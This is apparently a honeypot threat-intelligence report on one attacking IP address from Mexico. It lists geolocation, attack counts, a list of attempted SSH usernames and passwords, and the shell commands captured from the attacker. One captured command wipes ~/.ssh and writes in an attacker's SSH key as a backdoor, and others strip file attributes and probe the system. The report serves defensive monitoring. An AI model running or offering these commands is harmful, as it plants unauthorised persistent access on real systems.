Active Threat โ€ข CRITICAL

148.216.255.251

First Detection1/20/2026
Last Activity1/28/2026
ISPAlestra, S. de R.L. de C.V.
๐ŸŽฏ
295
Total Attacks
๐Ÿ”Œ
3
Ports
๐Ÿ“ก
2
Attack Types
๐Ÿฆ 
21
Malware

Geolocation

Country
๐Ÿ‡ฒ๐Ÿ‡ฝ Mexico
City
Morelia
ASN
AS11172
ISP
Alestra, S. de R.L. de C.V.

Attack Types

cowrie
dionaea

Attacked Ports

4452223

Associated Malware

Attempted Credentials

๐Ÿ”345gs5662d34/345gs5662d34
2x
๐Ÿ”jetty/jetty!
1x
๐Ÿ”develop/12345678
1x
๐Ÿ”taibabi/taibabitaibabi
1x
๐Ÿ”roman/roman2026
1x
๐Ÿ”cesar/cesar@123
1x
๐Ÿ”sonar/P@ssw0rd
1x
๐Ÿ”temp/1234
1x
๐Ÿ”test1/12345678
1x
๐Ÿ”elastic/elastic2025
1x
๐Ÿ”scan/password
1x
๐Ÿ”temp/temppass
1x
๐Ÿ”bryan/bryan2026
1x
๐Ÿ”lee/lee@123
1x
๐Ÿ”test-user/Password@123
1x

Executed Commands

$Enter new UNIX password:3x
$w2x
$ls -lh $(which ls)2x
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'2x
$lockr -ia .ssh2x
$top2x
$uname -m2x
$cd ~; chattr -ia .ssh; lockr -ia .ssh2x
$whoami2x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~2x

Risk Assessment

80
/100
LowMediumHighCritical